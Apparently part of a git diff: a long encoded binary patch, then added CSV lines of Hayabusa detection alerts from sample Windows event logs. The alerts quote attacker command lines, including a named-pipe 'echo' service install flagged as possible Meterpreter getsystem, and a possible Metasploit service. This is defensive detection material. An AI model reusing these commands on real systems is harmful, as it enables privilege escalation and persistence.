z`SnH%Pn+?Ksd)qBUHcAia37TX=}b&c=0ql|W~#TBEo4m;bcRge_j4Ssz4{zAML;JK-X9=Tl_GPp zDITuRZ!2v<+ZRn!E5@?=Fp|f>c^@*Xxb0vZw4eG3D9G!g0Gewzh5u;LTwUSz47H7| z#ag@&Q#hS!u9vUS_cJFtEIJQblmm-cF+j%9)&5xJjBiJL43txD;iC;px1yRaZfPa3E%D0+-uz%|e2T?J%u zhCj=JZhiSF{fd^Uae=#eNjLfD@C}NYS-s+;EYLI z*HHH`Nqt#YkYWecqaHemu?4M+3>1(_MN$#vX*JNAfbpNB;2zMoBeB*D`l*6uRd3QM z=oo$EC@HYUc!CW;*vSTRKY<*>JmAc0^LyMYy8d{CBVqNQ7JAX7==JXcO)Y!=XNoqm1-l!kZDEHY1H2WjfPKTs( zA(oWpO?8@jx<)B1Oj8FB5OwJ-HxGhH-FYn)IHUPTeVTM|PN`6`r1Q?=g^k_G(4Ntqps%szhhBI~SI zXRyDa(Ao62Q}X6hF7|9; zvX4Sdxy`Xy7CSN({&Wz}ti5yX{k?j|bO|Y{)#28J-c0VSRy};1i63l_BA_R<*DWRK zws9vsI85a&h5U}M?xf}2RGq1f+f_7IbssV~eHC^1lJlftwKR?f8+y|SMiilo?KLD_ zB75`Y9{sj=MS>k42I|vFnRtD%9<|bd%_oH56?m?bx_IhHdbo%~l-mSgSVheMsw$&P zDdy8X{60G8HO(_CPA0bE&4rqgVaWo&4yEYwmnsxO{kvTCy$tFMDHptdheFLx!=Nw}jSX!ncmL^eZN-5^kM?!DJ0C7%K@Z`8aGp1bTU zx8Aq&@u|jJdays|13?eag4#nuPIu_$-1d<4Xb;t|wm_vu^N|CqkLlDrH|ovI)?1vz zJD-%>qjJhsi`}vA^#MgZYG4+kn{)^z?QLum&|$9j%qWm?%8G-};C@wmg&bW`On3mYT}I@qs!6u3!T z@jO_QHMgkML?$pPktV&^F$R8XZz2=jgbkbYNV92#c+psXax3eW!a?@>(QgIJB82#i z0_XkLCD@{(U{3(>i+=UlO^;LeDc?d>a81r3RdxZnoQDT#uXt#;EreloiCeDw(efTVxwoARS$H_Ma8)~w@zN&Pbu3_k)jy`B}YQbGdXb4C*!Wur};md~b`FJ?5J;Rba5h z))S?!PI-U2%SdhiCp42yA&gx6tSHCj0YsCw(IawFt=q52h~!w*)<%8)%wPg;vB?{U 
zDXf_+13}2a+pOS;bb(I&b(~Hf6UJsb1!>Xlhy4&SRu$m8ONbDSOfU8EhIcu@u_}S z1@jlY>cu_t^#Amrv%8BQTjcUb%;U3nij13T;HR>*Hit^UH zn0xUiVf&&)8x5p%I>iABc!XRqHyfJupePB`I*DclOk6Hl^9bWf9x-N01MdA_#>RI( z#BGYM8Dl}2)K7}E0ScC8wsVdt_#ZVSvjC?{CRC8WoMRFDpjv(f?f7Xo%ae9|GmeRH zqN%87G4(RMFlA8COP*?rMtXKN2GaP|MHA4@cawvK+Z0aCqb`qGbxNc|TWViXMN36{ zInu>I+~cB1n?_q)vVR%Y8!7S&W)vlW?E7s3^=mro0a{KuPNcm_kPT3rQ$r2tSC#i% z5TpmTyzA(#v`gg4#1``*O0_~(Uux;od9v>*FVr~h5rnEcRpZnno~nboDEIff()4Io z+?JilJIm=Q_Cp1ZpB_HxIJC>S{KE12g1kzVBBC|wvNJ5H04n8qY1W2MEy?5TnG?{M z_jp&ZSB&FKuSdUw6pWEED5Y!R_*Jmc;RHy=94wRA&hAm|!5~0Vnaks7YlhOh`yo!i zlL${12zbltOAfSX&6pWOL$!;1{L!!GCweiR&Gp;nZvx-czXD(6wqW&fl2u@Z2w;## z_L!%riL>lCRoiUsf68T#_~eqG?B#?tu;1m)07;0V{l9uypZEgoXSKYd#xisFeiP3h zyyz!`s(~}-uq3h^JhUP4glyk# z7E?deXr6*xU!jpzA1aLs zTv|h&f8a;?_?n%Xw^{ZlBeKxeFj`n=B|ulmVKG|Fk3UV0#G^n`R&f9hG(?r6!$*Qv40tFhNL~!9()kHM3HlZ{oaB&PBjy`aPghv@lK1F^A{Wd1QzlUKXBkDP4e|*g z|5i=d&rs7!6|-n=v!$>JWhzjO%}%`Il}U6NUrB1FZ^7nwPYEIH4Bp8aEB{-|pL&=d zS{fH*)L&tSI6L-}!XieEed~Id#ilNpml4H6b(zclxd-g>VF|{F=RWa}DAIx(W)a@0 zXpZLA%{ZtAyaN>`pwA~2=(L>c2wf_|BWv6~qC@5<#Wt4Benu^uh`{0yP0k~f9SQ`J z^hNP-?s)(%u{)K@qG2U$j{}2!MB$vBstrbYIskw;5r6I?kwJ&SC^w~Tul}V5H;t59 z6}y^Ge4P(?hMf%nAcXQOYJX$S)tZGHitUody-497MlzqetRg^{5>bS7JmV*C2c>uy z0WOX!w;ZHe-1y^3wW1_R=Hyy8FaBsfEA$df*LMwi2`LhWBuX_m2tth0wC?dM{jxz{X z564rf6Vr_6?#oq{l92UUNuA2+a@Nq&w{-sIUZM%j6qM8T;48VD{o06Lx{LzXJs1d( zQ_vChEOM><4Cm@sX`cVOqW6BE$aUa|)%Lt!WHA2V%X&$k_(aGrDW_f`96d)T9&OrD zjobm}R-lu*u;Q~m=b1wHgg*oGb8=b)c+N-_rxG5;26lcNjR*8jw2St*o+Y&Zf zbUVoZ>MSna@xpU?z$5wmy*%$ZXyfVGF^xr*Uhcl>T7~ifb8+KIuoa1hS8h#n$%RYw znS9Y40LobUnbN4#Na%~%NsN4nLqM5&d+KQss6uXAxu4;IlVVBN)=+7ZMjTzN(<2Ft z)4BbbrapE6HU|J1E;w(Mm;5u3oA< z7}bj2lviKlcer{CGiTRmp=e9?O($+FPq!aPwN5IrUO<(u2VC@g^`r}O>rgq+Cp(es zNezo0{b4V2RfeHoP$N^~gc9m^Fe9=>+^y3FkFAL$5!#BGM}wZAf~dK=3Jk=AX|+E$ zMMw4WS0l%K(nqm9k}o(WmbYUcb-QCVSS36u!9NUpfZ&_|20(%>6m;<>@TTY^R^!(C z*B7eUkcDrg#`9i$tbLu6W*3|GwAXZr8>}2@JA_j1O>#$Geg0LUy(ZMw+hvM-wjQ#t 
ziZreP*m1>AtO@ZL`R<$QDrm=n5s0&2l|&po?xr7Fe^HCaYeeLGgZ~k`}%?OSp=mRQ{yw_W}(!Lfz+GPmgB;x_?!GLzGeGhVU<2AO+KMlwU+KVrLoLaP5J zN_ICwniU(0XuO!Xb(^kb7Ar_CmZ~}oRHn~qTrY0^(673{KBA6e7M%ZN;dnT4bdj=s zfsF1)_4TQ6m|*q2FJB_lJUbZdb?$KMUd=Z&i5xSX$1@*pH2i_U-h3|2D(+QCoQH$B zd*6E&>yB=Jn)(mJoPZw$uwwsS-I0X}t}ymd1cPx<0D0N_7D@+fS%RRO({S%)?bqCs6+( z(Xp=56+Si*_&eNk7Qike0AN@w!8{fW2l*1HJPi7a=QC5|TTcz1^$;=+7M^x@dU|@yb(Suqc@4Tu zBy=xmQM%WX7Od(mX{B~hcLlq?v;B<;u112iJFSO|9T*>Y&@z9|&X`ZmZaa@;fDZF)JC4U~NHon&1AR^}`?{h^Alr*hcV zFE02lw_Nl?(m#!vIpj<-^niVR5z()EP3yes){K#>JP`wTLQQ`wI>>%(>;7m~Zk46E zYabnS*_70b+84hccuTQBA;Mz50MKZSWPcoZ9>=d)XSu8)^qFy9-~O9WNeU)|rx8m~$odgrjPkoZGj~7N z6drt${2--T5u%t~n8${zmS~ew7V!p2C>W^ktNfl=s7XqO;I5LzKIJ=u4_3ff!;RSL3N3fPKWdF`fF@s0E)X%6*jSz;Wb54c&1t;#%m zc-Os7X~>?SOrxHusZC4xYOIKKHsrSWv?H_mxBGsg@Nk?R^=pp-=k7iq_wrjr4PKv8 zprVK2g;-uceQ$D?+g_zh9EeQ0AF4y%s;;$+$!O(24l<*um+V5*+@(jiTa)-P#vwZc z>>SxpJ|HA_DpT=inbmliy_VUIRqr0!RY?-wv-;;ig-<&*>qPdSg}ZJOtgNB?bPFXl zn1Ml~Eb`%l;wC8xWpQzhl%vzG%vS9W^Q8UAHIVF$FIFv zx2eIewD*K&p+5TUj~TQtzwLb;omo{->5@2dPx3m$&-5^Ng?wn_Ii)_(Pe9X zA$2g@a);NxOr!A}Yu4N8G=psfr2T;}_GKxyb5 zW_0d{2jUf(93Wg;W?4#;R*FDUAD;CLzga@4)vNr42$A!0*tn=ltKQ=YZKxAdbaJ%; z^Fz}x%=viuu#ncf7c<$;N&MA82SVddnxvquVE~K&7)04;A}$?p=c9M_V$93}+36nT zy*u=t+s}>CtDj1MWV{~v#kFJK_Q$a+Q5WuwtFT8C;As0I7u-lzF~uq{tIh1?#Acs# z<;-;Vr^G_!{bJvdP`&)2!u_Cy4^xhNXu0a~pglin<)G_6*u;}$FXlU}RU*RA6XToH z_u_AIU$~22Ci_YCZ(a*qr}Z_HUZg#t!02{f^=$Lte6;SbHoMxr4s?Z@kkzl^dL`H% zW~jZxTO+7<0drMe%=gqT#JqQkRMH#Kz*?F^#wE+Y?mR!HD&V;U1Qt6&6-9D?%mcWJ zPgb&6%#MmdmLeg|r*w$hYvP`ECabCyncTRmCr_#-zb&}5LP{KFgwh~Bva;D^? 
zaGyPvSNVGeBc4t}k;H>7k6s(ZA#%_)rocc_#92`TO>w#KMZmgmd)uup73Va1Lfr3W zBYmU9K1R=L7A(A)f>FwiK0{)-&%ax>)h@o=%yVgNhcv`y?rd+4{c6;lx7GzwT#58v zU`ht1K>!bxwO&67S5)f+H@-Q!hZ>>q0IIpMX)pEbuj)^Xb`SQ%rmj*BUwnhg#q2Bj z3-+hR&-7|jue9lyaV6c2%CmoI_{M7l2-_udoFyXh!7XWhUPik$o#AQJBwh8`C6V*b zThf;2-WS|<$w`KB?0dYjG)_gAsc3~;zG4XVuh%oRoyNiK z0QG57MxhV)yKJwd<7dszD`VOo>7y9bsnd!OfYJFXS+>aI7-B$*;Ja&vZ@=E~bz;Z53jPXD;VsR_5{CrYe^4RIf6x`eX^GRMCU9;y-M}8Pb}cxeY>+E z)(d*s` z2ArtFCr}~MGm5yDi2_09RqqvnPyO^XE~yvTv}4@7Vtb2~m}d9U4@0f{B}VT0ZtU?q zcn}Z$8i%r+*{9MOq(0_$-e~E|xX;W417WhI)#|q)Iu_xn*uNyaVqFm#CihxW*nF-!n zqe5<)Kc(MwTZCqX=S>c}{kry|OnFI-35 z7Xsgecn_(pSMv5^d&cvLL^*)oc2DocycHc#f@amrHr9)Ven-&RZ|20E(HS zRf?PCE6IyfKupK{KCj(rD0$bg*E;DZie;gefk0EPcf%=RMYXQKab1{Kl;@#p4;a8 z&5)%ok9k(mFYo^rv@*V?bwzLpP5WfJDxxIzJ~g1w{(#g51#c%;qoMV1!R;8Y0`phm z5hC?aWwH*4Ml>8N%`b;1#{0-5$tbw%A+vvlUBFStW~A(Q*ydyX^qCH25JTpM?I@?d zXb3P=xjO3%kZyY3dD^KMQX^Lsc%u?^yfyB)

NXV1)rF$vprXzGL&tO>oF{AggAP z$%J%07axdPIXA`K=G6tDQZ_AeJ3zr@yR@sl0Mg(sE`OtO7!~5cEd*4u7_Tc1GwcvI zu#VvSyDDddQnQMINnu6~8Pjf*VhGYy1QN3Cvc`BpYdv3xv7Sm2MJScA5a|162KS9UnJGiF?o{e~|agd}G)R zTgU`Fjn!^69iEeZJp&Y*=_{g%yT2Yjs3ViwOokU#NQ>t$^ z`m5d&R^v}Z0V=Nf{s};$&@Gm6(JOU+Yv2XCJ!u7~>~0FOlBV`C>uLPS-g`?JQnM;U zA!R=;;jlKnn*0P@f4)C{1BCgb8D=I=_=Byux_>^95VIJ=8OcEueEG6NNgx?@4>6(0 zltNT)X^KxHW^*^ibLn39_sG!4jf*Bq)1`Q4k5=A+mE===`~~aP7hi$ytv1!Vg8M<^ zhE~5l^kPYZA##l+hlJz3Vn`O#U(~!M;Nsv)E}c&ev$%=&FB6ZYGUWW4{E(1AXH*n&N$$KR+t438-+tiYNG%UzDK8wx@8b zL2Y|;w`QFHP~D7@{{jiDbw$Vmv?L^!g6?e$hq~iuTX1MnIg&5<9B9c4l8 zq>@o_128dTc0j33%3F|{6oH5GEa>ers#+-6MrXag-bL4bYs2}-ij6Rw^ByoYCjf&^ zZl*lU)wzYvpk989;=Lxx`gTC0mfJ6V!2b^CD1m`okv#h#?1BBM_oyWsB6i2AiHYm} zuB_0!W8o`Pq{q&@3ZZzk2;p01qhLyb0+P5+w&sDZY6P2J7Pp%n-9??n5DM?Ww!8GH z3BkLGoI5F7KV(zC_`VtsK*PohvRTJ?S9_wELiaAfh{32WBt37SYrj_@c0{@pNzUXN zCx|;xRb+K#NCigV+t2V;vrz7mq9)dkdA@I$5nFdE?mns($YhkYdN#9@F%bRN;JSp& z=SJm}biNL3My0{!MyP37uO6C9(Fa&`D*_?fLmC2GPk-MDC?IiLC%wT}A3Ul2OBtp4 z_WN6sc8hKM3k-~=dMZNZ~7*|QhBC_5?-eD2Ol)Abj^XLprA4j=@#MN zd4+$^bnb>V1G4Gw!hS^V?+B4;TwR>);6yR8T2kKKW6+Vhs*a*%J&EUl7y9CL6fnrj zk9>dHNBvUd$;a=I(PzhZeIP;>P=i~S0dE}lGYHku?y%~l<%?K3GPZfI4ocx5U=k1S ze1Pc~hS?{9P725BunuF-+l=f@ft@x|b04+*PKkpq9S3MWd_UPJjk+65{C$s@05{?( z?Vx5}l#_SyAFfoCxS28lld#`rqt3iw;ZAt-pnuo{6 zvkQWcUE>10nq1;iPw4MF^0)yV;&r|zaWUcj-f1Npa#U&yq=jdAWcrx=)_GW~5uI`Y zn^pRkG5qN(Qm&Kn6tV=-guXw;bprsQ+es3-ES}Um@0y!UurgmLdd&K>Nm%STQ8AYD zroBRV!0W9sKP=^BF(V`n%s4(c@0q*YVxsDMTn`96R1tQX$;_fK+XK^$N6S&o6ux`2 z#=^mF+aF27VXv64tOE6=?(k}HejrBmTQ9#H?ANC#BcKMfFg+OjIOMwC*$RWX5Ni&tZ_?@3tFE+CW4v zACj77>Xb0hv(gJ{65%E43{MgOl%L6-uq*|-91edqg(fCyuTzGgW~IiA z*=~+uw+Qgm66G(CFFbK6QhjX!UocHJk;UXj!t6~xClYt4M~<%sYKAoS5q9TZ3MRy0?2CAN7_53XjA6pCR_(sXI1WZ-tRc`-%W6y()Oh>9O;qH<9(K* z`X7GwxM@rNxlNh56GJQKLzmZh#19=b=6t~`@!erp$%Tm|#SCMW2@u2lb1{h9j9`}C zbj4=rAsB5@mlI-HP^Y@?{WfZF)j??f*$k84q<1do%$V18uz^Na@95=w1h`rR@BPDT z$+V(F{|R)-Hf2tZYSu)z>n@$oMZVIt;Hbp+U7THQge(=Mv!Biv#JVecZVC@S+9Pqz 
z7MC-}Ei8r7d*JOXnB_e2x<;+oOM+0Or25>h@dq-Y=G&rkOINOCesS%Gi?-d7+D?#5 z_IoXG^l`Pv$Th~*<|Qf%Sl>a%MT7IUw&%@f9MJiM%X;lgU8#a~8G%L|vL-DF$+P)Z zv>fg}_#0kM4l4WMfuc#;PmS7n3XcIdrC_h@8g+sSd@Ae*Ti2fSpw#4$q^C^bZ4OmeN(PFi$%s zq|ch|o!*Hx05sz3z;9I6cCqNx&6c~HGLPRPea3|x^=AUX2VKdH6dU`5pvHxmrTt8{n;$wYaW3$uvVy0(+gOz(Bm%5j6$N>xAd3ObM{dI3*2cwA z%{7dmU29`iq#&EMEE3Jo+Wbb8;^BnU*x1|30%1q}ULS0YoO)XH>aKDY%N)E~66LkF zwX3VWqh=UKbtu&9O9iN`yPx>$UqnV%a9(npe7x%V?FnZ|X~T0tiH=6oO2+T1{dQBD z@ZMac>_DZBHs$m0jnLL1)e$~##ss&{k!(T7M*Vk;M%(TK!^48MQH@I>t8WX1AQDCf zpb4~D2RiF44&?omK)m{KWU}NaXbukjwL3bwT06`4Zrc{*9sfHxN%P_=xd=9bSwP7f z)3+W-C>g5kjKt|66j4D2Y&xv6M7^E}0j(5UsddlgDoGWOsdS)NIK{8G^{!(z=B_#{ zR`(Q9f}F6+299g`4qx=9+bm`(6c;vG z+CQQ^fv)5W`Y;dkQ(z1mijyRYmb>}|bKTmMT}qvmeQJps3f8nbUuf|eg-2M#A&BhB z4N3+FvIxm?2w&!!srVJJ{MI!LvIdBqQCkY=@!YwstzXKzvh&E%5C?d|Ik*BmCQ9YR zcjxvfvj)JF+$O14DWU=>K0Y<@N~ycs)sTW=cy^Bch|kGy4|rG*nI1E$vBtG% zM@zt7uk0W=weKk4cqLwvTN{1|9}=YU8CtCs?1Azfq7$ZIhK6!i*4w44D76VghXx4& za!bRXs*IUyC|gDND8k!&M=4Ws!s2Km*46H;kpLES!g!+LQoK_`zNRB6 z#B1*7-}Np}O%|OPo;fR7IW+(_yuv(SX_s_v*Dar^e}Xuq(@fO}nECEn_AQ2gEivPV zRQV<)a|2n{>zVI0whOhOb%C|>5}pZI&&B|B{!5SxAaclPBlNwobB@Yo;O&>jdH1f5 z6wc$HwgZGnTo@(B*4+v^18uO`Mg%~V_w0L~#&-MfZjEMNz`Xq+x%p~TZ=otpO#Y|C z^16`Gcl!7ugdL1cW2?7?@vRRRA6I_?wx)yVSX5I{A*`Vx zxbf;Cs!sBdh5i)0+qm9}S2;ktF%o&GlXmiRrb@D@NgE0=?4xv!fbukv6hfP*FK0I!ZR_hHeSuMm?@6N{l zY}%}33xZ2t9+ht|I=kW5W}i@br&VbB6+1|5w%{Wndom4>v?2$wusKPIPt2DM$dFk` z9~aavo7>wAQDl96acpvaX{>r(_e#p8QbIE$N0K!SjWy!tP`jS8yPo4?>(6=R5k7iZ z{jl-!vB%{cgNKp(kJ)1nk(}SVK$J?62HAhf4z&x}o{i3&bA~cF>Vutji2u3i{@Q*2 z@SrwsSq;vS(7BPiR+wg$Me@`-G^MC8&JEVeIdhXe!D@!6%#zVs4X!i zLk-%fs(VDIPWQ41PqITWv#d{R0?UZ2AO;xWRV-K|?_kzgS^S0~Crh&mmMOg>VRW(! 
zRqTgk08daL|k!+bJG%BrF?oav#-x00i$%%xmkFI)043 zoFuz=L-Ob{f43O9^qR}7U5}-a-XK}z2ifd@k8gSv31^>Lh z{fMYKrM%IGtKogK{ie#8!XI{0=_$RVKC9yKf4_1&4^rUxvkzzI>T76VnfUz!IFxP(Ddd_l@(R@qT?IzS4Y=fyA;Q z-4k;v6o0A@oXD$08lxz^Q1xmk@z4JRpNOd1{#K≤NM&{ks3*69Q`SveKv9eV%nR zMA3d)Pra5uF*$ztSkHD~EYk<-x6CA^TecfB^&Pkol_z`06GrmaBx(^|v=Cl!(=p-j z4_WlHt=L*VX!k;QmyyA*tkt zTtm-Pw;{914zKaBC|UNV5f1HiSB@?PReD{MwlG5~-K4ocJmIYXbzHz8sB0Mh&FTG{ zd%tmv{goJeR#%Z!Uarn|jZ>X2J3OK#IphkAEZ1v7h!;s`YqsZu8@F%HY!BsX3Uz2Y ztJ)@%kyiT`x4KGBRL#*;L-ywt{ENT+4?q3i-b(xiEI~feN43xY<=g+?-N@g*?X~~y zfSH3N+i(9*8}e_T`A2y0_ao_#?%kag%#8ZM_J4c@|N3qJ|Ks_OOXB~Vk4H)`K>nE& zEuYn3=wQl3=u2{4^Ken$i+!ejs8wo&5Zqf#4{AfoR#feKVYFUpy5B+mt7^^{{?kxb zbMl8@osLCJ8hMPSl$hIAMYjMIjc7%&f8cej<+T5x@#)SLSM>bg17i)^YB6Y8GQuKz(CL&(_nL zVjCU>7Iftk?zSqI^0QoGeqheIz*5s}+eD()*V^z_Xv1x?Wq3LLGSiKdNZ-xoosot_)YXM_vTtwt z&$n`-ae**uA}WW97IuWXjO>gZZki3DG{e7tD$=@lu)ux2g*<;xPyTLy{xpIYo_9Jy zUiP81E^o0*TFw!jLF;LJ^4zq(j?QGbDluF@v`{+duHWGS2ZSzEs)a235|d4H{X>nTvm7LCyn-JCvC%6 zyk;%h&68~x`OcfVg8e8^5-=^S9RCD!VH{iQ8~IX)tQCnp-&8BJKQNjHa+mEY^zA8A z+&Xai@mlGNL6if;hcngZ3aRS_#XK3r7&!AAL3JJ-&nu$3-fQ4kjTM%(I+qRyBi7~E zz%&4~R)OKjXMT^N{3DoZ)Uw9!OJP6BzYjF|QvjbbI%S*ipM8N8YrsRI%XKL@JN2Po z6gUFd&RHb}KNIFqqTF~HISbov6Cm2J998eMj^*k6lEX@pS_@g~z4}xp9wxFA%%-}w zIt{x)dl?tV1Pd(JPJrrKixqyc<-j&3l!c=9Dp=nNO+e%9O~zbUlp$z8t%*CRT8*9; zUhXe1SCKd5XCK!`O$5!+CR}(@!#$*{#J9Kk%7?*+Y;b=o8`rr^{VGo#*sjyN-Rlc} z`{|=etLs!Kq4I$3~`?XDOB8xkRkMn&AGyt*b`qwvj^ z2dauo38%hX`ztam?6}V|>Qj2GW)J6UbS;eu40<5u*+BjlN_M4Z&uZwm9+lg97^Fp+ z9b~Gt7hgNsxbamJs+jZ9Pm9P9nVgXGJv=wLt3(Rr&dCqbzU55 zV;M;Gg}tv^9j`NA9joyN1oKM=PU@^o=GuIYKgkjlQQQ;S85(NLxyoHu7L%MzQ{~srb_6rGwe)&C?O5wcN%_wXhIc zfBq^s7$JNZ8g@SXS_C}RZ)Df;@Um5Pys%T}7bKMV9a!#k8Kh6KZp7NXfjjKp1YWi7HB%I|naqi9M5I>v)u%4$$8IZqy3f;x|enC%3WOkjm|(p>2W##^*+;exIGk^7!yJ5 zq-9sJcphXw;xx;DRYf7Wl<{1*bRUGKrM|vcPa1BRX>`&=eo1%mZ_B+tw>#SOP!d$K zXQgr*F41wAGqUGmBbG9x}@_aNgndfUbaj2s!8v4yR-U5S<~e(L12ho z1mNL98xE!m1|_?W2jwIOR$ng<);+Ui%*i3`y4c+lHok7a-66vPt8J%YKn-ybU##>h 
zZQj=FEc*gaoFz-tai~UMJnBPM$jVik$GjKbOxEk&dGv92Y?pz%j4Q||%4vR(_HDT+ARiS6mV$uPure3CZqJM|P4!yqS%do??y!GKdR~8Ky_p^NgO%M2Ycg8jp)04A#gN}sid98L0W-h447FJ{YPZXF zmirzV$x&ttNbS^*p1iTsG)zCLoPdA2+4cDvxfXTy<;P@BfO#oDo5p~q`JH&(1YNKE zk3QSY%+>8agwA?f2};#9?_3g!8&Kp6AJ+j@+IFMs6T5y+NBxOLE&SP>L(!8jwzwu+ zaBvBz9*A2L#sAc2=-r0Gk-J6Kfh@%h#6l5Gg<8=-Ebt_J%Ws2y#uvTg z;k5tMY^fH}1uNqurH;m%p`HIFZxTJOsWs7TKMh5FE3Zn}Vou$ntoA#|Z<51(0)(vE z!^N=S(xoqbR%5Rc4!o0vjg9M%$Hk@&DwpNDfGDbG?H4vUS1pb9rs1Ox9Z_QIEGdVD z<|9?VnuUw;u>E3jtZQ)?4{KyfCcBYgaHkEvFZy&GWE(c=`zxjF(gt@{@?fF8+VzO^ z4jc&7_=Rfi;0lY2PBq`0ZSiKubBj9yW?HOLALJ$r3a5IXClola93?*=ogW>C&6H3Cik12P2@9#m{?yaR}{^D^odagV8*^iBD{s^iiNn zY%pTRQqobMGi{sR_s?R~-_xbP_V7D03=HVN68{F)zc;TpOL9C)u^J`&rAc01p7uqlX|w*Sjr@>3W7qI9d+CqnO@Eko zVh+FQHppjJ&-(IMX!gO42Vg^A3S?$3bFs;Var_m(et838+cAg;QpW;oxJY=@l5$;K zb|_?a--NE?fxuK0v6}{8_WXU}8nx}(!|S;kG;SvBh&XD3-1H?11vT%~^%83Xt#>)-RAQLk8kH;pI$>KZCn<)T*B`$jmMvnxp5?;$qB8$ENUhOW0BWhLAIc$x#|!G7E=wQvGu#kbm0<0-n2vyHdD>(O zJa%qK_FUun7Glz~e5bsOUlbwfgG?O|0(QQC^u$9!8nLz3f?~eL3tqvw`o{)!M}W+u zR~rubhqkl88$Zkgc&Mo*k_go=UTXRdYGc#%DVoIdT&cwH7lV zr?Z!(Ym`kt^Om{Px{%?UX#>}m4Mtt*d^qh7zH+5bLX>Bw;%5wLTye=LZMUx~XnxLxea#0TATKL4kZ;3CAqp-y6wvMIbFr ziZ)vQA6M;P%QxQV&P}&r(q`rhv8B+AU8YWvY={yL`i$JjoG~}2^;dEI6aO*mF(m|5 z8TU!At=UohuQJ2ygGs;gkDgxxD{mqU?~}Z{ab$6EwjXCAq|Q8&oww2pibK|0v(6lC z_nlDU+Z&#{XH8x1GvG&o*aXZ4y%Ft+a(gO_XId$obYh&HEB~v#bB~5HjpKNZO3T4I zkxeJMoDCzZa+(PZZ5G`OxvX2QatWECNla;s=wcX?tZ>$?m0Ti}VPu9;6Ipi|6J{_P zxz4<~O-~gEESwkDX~4GF!QC9$|o-6Tc6I2vuUoMXj&_jM z!Z2)P+SR~EiAX}e%wB-K0KP4I_TEiZyt*lhKilyt!I~q4G!oszS+2>A|(c;>vzQ5G{A&weqM*0!vKjxun6k=cP(YKH z%_!K6R&?X{r=GP3qOy$n(ceWj1Elymci?rXo=7lc=fysQKWH1E-c5?h&@Os1^AWi? 
z?2=b^qYqyeTr-C#N3o$n)VT$4DG0cRf%^hbi&?;DQbb1k(ttCwzLG_D-9y4&2d4u( zK7|*Ys4+iz{R+Rzre3d>6r{0#CiyM`EFVDK=yC1 zJgWn+4IK-(xv8E+c~#TH9s}MBXSqE&stF*Vv*;`+)wfSSN(!J%Qw+R^lOt2WqzL|^ z#F@_ut=;=RgHE=L$=GtzaE@_oXTQY&bZ476#)k|v>T2sy0aor)&$Oy{uRXl#{y6Q{ zJDxwEupQF_1zoYmWX%F@)?$42NvXb5#3%rh5I<&s4_!NZkik?jpe5q?Nf8+2-=wT;o_#~;cM&(9FN7Kc+>Va|eq z4rn?(zazkSm7Hn2XU8SB&#cy-6-M%(E`8BwFa`2Ws|PrZoVx?264pie#PKmle8^BM z#5xHs=^1!7Y0gv#;Tg<{l%#lq4Kda)D_XE&mo>BnmF+z zTm5(V%#`IWqR5?b-};7aPVb0Khb=pI9RL~$tr``$-bf~9;37s00%$KVxpPPQ3hHEo z8zch+F~@SaVWMHk?Xp5+Wgt+i;t=r`Rw}RRQh2$@5Jr@ka723b$v;al+1av`5Gr=D zUb#Hmn}bT5aSM!Hxo9n4+_ZP96~?KfGV=V2!~8ivu*w4*N3^?Ys(v%}8?h#c_nAw% z1lOQm6`B9*x;6^#l)5X=F4Blq;jw3no6kE_urPpMN@ThspVfPTR_0NgFjv_EoTn2k zFJ2f \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,,New Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,,New Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 